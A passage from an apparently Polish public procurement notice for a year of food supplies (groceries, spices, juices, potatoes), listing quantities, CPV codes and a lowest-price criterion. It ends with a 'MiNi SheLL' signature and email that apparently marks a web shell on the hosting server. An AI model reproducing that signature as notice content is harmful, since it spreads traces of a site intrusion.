26	Galaretka owocowa różne smaki szt	50g	15
27	Groch konserwowy
Skład: groszek zielony, woda, sól
Wartość odżywcza w 100g wyrobu 64 kcal	szt	400g po
odcieku
240g	50
28	Groch suchy	szt	500g	80
29	Herbata indyjska granulowana	szt	100g	200
30	Herbata ekspresowa, dwukomorowa z zawieszką
starannie dobrana kompozycja wysokiej jakości czarnych herbat o klasycznym smaku i aromacie szt	100g	10
31	herbata miętowa ekspresowa	szt	100g	80
32	herbata wieloowocowa ekspresowa - różne smaki	szt	100g	50
33	Jajka kurze klasa L*	szt	szt	7 500
34	Kakao ciemne niskotłuszczowe
zawierające nie więcej niż 10g tłuszczu na 100g produktu	szt	150g	200
35	Kasza jęczmienna z zastosowaniem
do zup i II dań	kg	1kg	150
36	Kasza manna	kg	1000g	30
37	Kasza jaglana	szt	350g	10
38	Kawa inka	szt	150g	50
39	Kawa naturalna - drobno mielona z wyselekcjonowanych ziaren arabiki o delikatnym smaku i przyjemnym aromacie	szt	500g	15
40	Kawa rozpuszczalna - kawa liofilizowana z 100% kawy naturalnej	szt	100g	15
41	Ketchup
Skład: przygotowany z min. 120g pomidora na 100g gotowego produktu	szt	500g	400
42	Kompot agrestowy	szt	
900ml 	5
43	Koncentrat pomidorowy 30%
o niskiej zawartości sodu/soli
tj. zawierające nie więcej niż 0,12g sodu/soli na 100g produktu	szt	900ml	300
44	Koper susz	szt	6g	30
45	Kukurydza konserwowa
Skład:kukurudza, woda, sól, cukier
Wartość odżywcza 100g produktu
115kcal, białko 3,9g, węglowodany
przyswajalne 22g, tłuszcz całkowitny 1,3g	szt	400g
po 
odcieku
220g	30
46	Kwasek cytrynowy	szt	20g	80
47	Liść laurowy	szt	10g	40
48	Majeranek	szt	10g	200
49	Majonez
zawierający nie więcej niż
 10g cukrów w 100g ml produktu
10g tłuszczu w 100g ml produktu	szt	620ml	180
50	Makaron, po ugotowaniu nie lepiący się, odpowiednio twardy, sprężysty, zachowuje naturalny zapach i kolor
Skład: mąka z przenicy durum	szt	500g	650
51	Makaron pełnoziarnisty, po ugotowaniu nie lepiący się, odpowiednio twardy, sprężysty, zachowuje naturalny zapach i kolor
Skład: mąka makaronowa pszenna pełnoziarnista	szt	500g	100
52	Margaryna do pieczenia
 zawart. sodu 0,09g, zawart. Tłuszczu min 72%	szt	250g	70
53	Margaryna do pieczywa z masłem
zawartość tłuszczu min 39%
z niską zawartością soli, niaaromatyzowana	szt	500g	550
54	Marmolada wieloowocowa - twarda	szt	1000g	10
55	Masło czekoladowe do pieczywa	szt	350g	30
56	Mąka pszenna typ 500
Zastosowanie: jako zawiesina do zup i
 sosów do pieczenia ciast	kg	1kg	450
57	Mąka ziemniaczana
Skład: skrobia ziemniaczana	kg	1kg	100
58	Miód sztuczny	szt	350g	10
59	Miód pszczeli naturalny	 	700g	200
60	Mleko skondensowane słodzone w puszce	szt	510g	15
61	Musztarda
Skład: woda, gorczyca, ocet spirytusowy,
cukier, sól, przyprawy	szt	200g	120
62	Ocet	szt	500ml	60
63	Ogórki konserwowe	szt	900ml	30
64	Olej roślinny rafinowany
o zawartości kwasów jednonienasyconych powyżej 50% i zawartości kwasów wielonienasyconych poniżej 40%	szt	1000ml	350
65	Papryka konserwowa	szt	900ml	20
66	Papryka sucha	szt	20g	100
67	Pieprz mielony	szt	20g	500
68	Pieprz ziarnisty	szt	15g	80
69	Płatki kukurydziane
Skład:kukurydza 98%	szt	500g	20
70	Płatki sniadaniowe w różnych smakach z pełnego ziarna	szt	250g	20
71	Płatki jęczmienne błyskawiczne	szt	500g	20
72	Proszek do pieczenia	szt	30g	220
73	Przyprawa bazylia	szt	10g	150
74	Przyprawa do gyrosa	szt	20g	20
75	Przyprawa do kurczaka	szt	20g	20
76	Przyprawa jarzynka	szt	200g	20
77	Przyprawa oregano	szt	10g	150
78	Przyprawa kurkuma mielona	szt	20g	15
79	Przyprawa do potraw meksykańskich	szt	25g	20
80	Przyprawa do chińszczyzny	szt	25g	20
81	Przyprawa curry	szt	20g	15
82	Przyprawa chilli	szt	25g	25
83	Przyprawa pieprz biały	szt	15g	40
84	Przyprawa lubczyk	szt	8g	40
85	Przyprawa rozmaryn	szt	10g	25
86	Przyprawa cebula suszona
bez zawartosci soli	szt	15g	25
87	Przyprawa kmin rzymski	szt	15g	30
88	Przyprawa kolendra	szt	15g	20
89	Przyprawa zioła prowansalskie	szt	8g	50
90	Przyprawa cząber	szt	10g	20
91	Przyprawa estragon	szt	20g	20
92	 Przyprawa natka pietruszki suszona
bez soli	szt	8g	50
93	Przyprawa tymianek 	szt	10g	100
94	Przyprawa szałwia	szt	8g	40
95	Przyprawa imbir	szt	20g	20
96	Przyprawa gałka muszkatułowa	szt	10g	15
97	Przyprawa w płynie do zup i sosów
Skład: woda, sól, substancja wzmacniająca
smak i zapach:glutaminian sodu:barwnik:
karmel E150c: regulator kwasowości: kwas
cytrynowy: ekstrakt z lubczyka, aromat	szt	860ml netto	5
98	Przyprawa warzywna
Skład: warzywa suszone 15% produkt nie może zawierać kaszki mannej 	szt	1kg	5
99	Rodzynki	szt	200g	100
100	Rodzynki w czekoladzie	szt	80g	120
101	Ryż biały długoziarnisty	kg	1kg	500
102	Sałatka szwedzka	szt	840g	10
103	Słonecznik łuskany	szt	200g	20
104	Sos do spaghetti w słoikach	szt	350g	10
105	Sos pieczarkowy w proszku	szt	27g	10
106	Sos pieczeniowy ciemny w proszku	szt	27g	10
107	Sos sałatkowy różne smaki	szt	9g	30
108	Sos słodko-kwaśny w słoikach	szt	300g	20
109	Sosy w różnych smakach w słoikach	szt	300g	10
110	Sól	szt	1kg	5
111	Sól o obniżonej zawartości sodu
sodowo-potasowa	szt	350g	200
112	Syrop do napojów
wytworzony na bazie naturalnego zagęszczonego soku owocowego z dodatkiem wit. C
Skład: cukier, syrop glukozowy-fruktozowy,
woda, zagęszczony sok, kwas cytrynowy,
aromat, kwas askorbinowy, przeciwutleniacz
Wartość energet. W 100ml syropu 348 kcal
nie barwiący szklanek	szt	500ml	50
113	Sok owocowy 100% - jabłko
bez dodatku cukru	szt	1000ml	2 000
114	Sok owocowy 100% - pomarańcz
bez dodatku cukru	szt	1000ml	700
115	Sok owocowy 100% - czarna porzeczka
bez dodatku cukru	szt	1000ml	700
116	Wafel przekładany kremem kakaowym w czekoladzie paczkowany, czekolada 28,5 %	szt	39g	150
117	Wiórki kokosowe	szt	100g	30
118	Woda mineralna  naturalna niegazowana
nisko lub średniomineralizowana
 1500 ml	szt	1500ml	100
119	Woda mineralna naturalna  niegazowana
 nisko lub średniomineralizowana
500 ml	szt	500ml	100
120	Zagęszczacz do śmietany
pozwalający utrzymać właściwą konsystencję bitej śmietany	szt	9g	40
121	Ziele angielskie	szt	20g	100
122	Zupa pieczarkowa w proszku	szt	40g	30
123	Żelatyna spożywcza	szt	40g	10
124	Żur naturalny zagęszczany
Skład: woda, mąka żytnia żurkowa zawiera
gluten mąka pszenna, zakwas, czosnek,
produkt naturalny otrzymany na drodze
fermentacji mlekowej, pasteryzowany,	szt	460g	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> dostawa ziemniaków jadalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	PRZEDMIOT ZAMÓWIENIA	JM	ILOŚĆ
1	Ziemniaki jadalne
od stycznia do końca marca 2016	Kg	3 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> dostawa ziemniaków jadalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	PRZEDMIOT ZAMÓWIENIA	JM	ILOŚĆ
1	Ziemniaki jadalne
od kwietnia do końca czerwca 2016	Kg	4 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> dostawa ziemniaków jadalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	PRZEDMIOT ZAMÓWIENIA	JM	ILOŚĆ
1	Ziemniaki jadalne
od lipca do końca sierpnia 2016	Kg	700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> dostawa ziemniaków jadalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	PRZEDMIOT ZAMÓWIENIA	JM	ILOŚĆ
1	Ziemniaki jadalne
od września do końca grudnia 2016	Kg	5 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com